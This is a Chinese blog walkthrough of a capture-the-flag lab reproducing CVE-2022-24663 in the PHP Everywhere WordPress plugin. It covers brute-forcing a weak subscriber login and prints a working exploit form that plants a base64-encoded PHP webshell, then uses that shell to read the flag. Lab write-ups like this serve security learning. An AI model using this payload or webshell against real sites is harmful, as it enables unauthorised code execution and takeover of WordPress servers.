春秋云镜CVE-2022-24663漏洞复现(最详细)

已于 2023-09-13 22:59:46 修改
阅读量529 收藏
点赞数 3
文章标签: web安全 网络安全 安全
于 2023-09-13 22:53:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wakengren132/article/details/132865714
版权

漏洞介绍

远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令

启动靶场

笔者镜像链接为:http://eci-2zedttamjkr84ecpucma.cloudeci1.ichunqiu.com/

后序操作请读者自行修改为自己靶场链接。

后台登录网址

首先该网站的信息透露这是一个WordPress博客页面。bing搜索WordPress后台登录页面。

如果没有提示信息,可以登录kali进行目录扫描

dirsearch -u http://eci-2zedttamjkr84ecpucma.cloudeci1.ichunqiu.com/

扫描完成后,发现登录可疑项,进行登录测试,发现登录页面。

登录页面进行burp抓包,并准备实施爆破(春秋靶场提示存在低权限用户存在弱口令注入)。

抓包结束后,准备爆破用户名(burp的具体使用请读者自行学习其他文章)。

根据返回长度,发现用户名为admin和test返回长度异常高,发现用户名为test时,提示为用户名指定的密码不正确,而不是不存在用户,所以低权限用户名为test。尝试test/test,登录成功。

进行漏洞注入

进入F12开发者模式,如图所示,定位到仪表板选项。

<form action="http://eci-2zedttamjkr84ecpucma.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post">
      <input name="action" value="parse-media-shortcode">
      <textarea name="shortcode">[php_everywhere] &lt;?php file_put_contents("/var/www/html/fuck.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWzFdKTsKQGV2YWwoJF9QT1NUWydoYWNrJ10pOyA/Pg==")); ?&gt;[/php_everywhere]</textarea>
      <input type="submit" value="Execute">
</form>

将上述代码,替换为下文

出现下面图片

点击Execute,上传fuck.php文件。

点击1标识,出现success字符。即为注入成功

文件利用

方法一

http://eci-2zedttamjkr84ecpucma.cloudeci1.ichunqiu.com/fuck.php?1=cat%20/flag

拼接语句,/fuck.php?1=cat%20/flag,使用fuck.php文件输出flag。

方法二

查看根目录下的/flag。

php代码解析

上图为fuck.php文件输入内容的base64.decode内容,可以得知,fuck.php中写入了两种一句话木马。

wakengren132
关注
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋云境:CVE-2022-24663
一只爱吃橙子的羊
12-01 1566
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令
春秋云境】 CVE-2022-24663复现
小高工作室
11-24 2514
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。直接访问http://eci-2zei2lxiq05pi7hyrjxd.cloudeci1.ichunqiu.com/fuck.php。提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。发现是个wp的后台。返回状态码为200表示成功。这里指的是任意PHP代码并且是任意位置。
CVE-2022-24663复现
giaogiaogioao的博客
11-23 551
CVE-2022-24663
春秋云境:CVE-2022-24663(远程代码执行漏洞exp)
m0_65712192的博客
04-24 794
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令
WordPress plugin 代码注入漏洞(CVE-2022-24663)
千寻的博客
12-09 2487
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 `PHP Everywhere `的请求,并在站点上执行任意 PHP 代码。 存在常见用户名低权限用户弱口令
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
D3CTF2022-官方WriteUp1
08-03
D3CTF2022-官方WriteUp1
WordPress PHP Everywhere <= 2.0.3 远程代码执行漏洞CVE-2022-24663
热门推荐
Flag少侠的博客
07-10 1万+
打开靶场靶场页面如下WordPress 的后台是 /wp-admin,URL 拼接上访问网上搜索默认用户名密码 admin/password 不对,只能爆破了,得到 test/test登录后来到这个页面是一个 WordPress 插件,它允许在 WordPress 网站的任意位置(如页面、帖子、小工具和模板文件)执行 PHP 代码。这个插件对于希望在其网站上嵌入动态内容的开发人员和高级用户非常有用。然而,它也带来了安全风险,尤其是在权限控制不当的情况下。功能和使用插件的主要功能是通过短代码。
春秋云境CVE-2022-24663复现
qq_70303095的博客
03-06 412
CVE-2022-24663复现
春秋云镜 CVE-2022-24663
qq_22002773的博客
07-07 153
春秋云镜 CVE-2022-24663
CVE-2022-24663
qq_43676541的博客
05-21 188
#简介 原文链接:https://culturesun.
解决方案-国家级漏洞库-入门漏洞知识点
2401_84915584的博客
06-16 198
成功利用漏洞的攻击者可提升本地用户权限。
CVE-2022-22296 sql注入
苏落is菜鸡的博客
01-21 760
CVE-2022-22296
PHP Everywhere 插件中存在严重RCE,影响数千个 WordPress 站点
smellycat000的专栏
02-11 363
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士WordPress 插件 “PHP Everywhere” 中存在多个严重漏洞,可导致攻击者在受影响系统上执行任意代码。该插件用于全球3...
2024年自学手册 网络安全(黑客技术)
最新发布
2401_85027424的博客
10-31 708
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来修复这个漏洞,并提供了相关链接供参考。 另外,引用中还提供了一个链接,指向一个网址http://eci-2zej5zymcbcri9jmain3.cloudeci1.ichunqiu.com/,但无法确定这个链接与CVE-2022-0543之间的具体关系。 引用中还展示了一个尝试读取系统文件的HTTP请求,但同样无法确定这个请求与CVE-2022-0543之间的具体关系。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2022-33891POCApache Spark 命令注入(CVE-2022-33891)POC](https://download.csdn.net/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [[春秋云镜]CVE-2022-0543](https://blog.csdn.net/niubi707/article/details/128305838)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值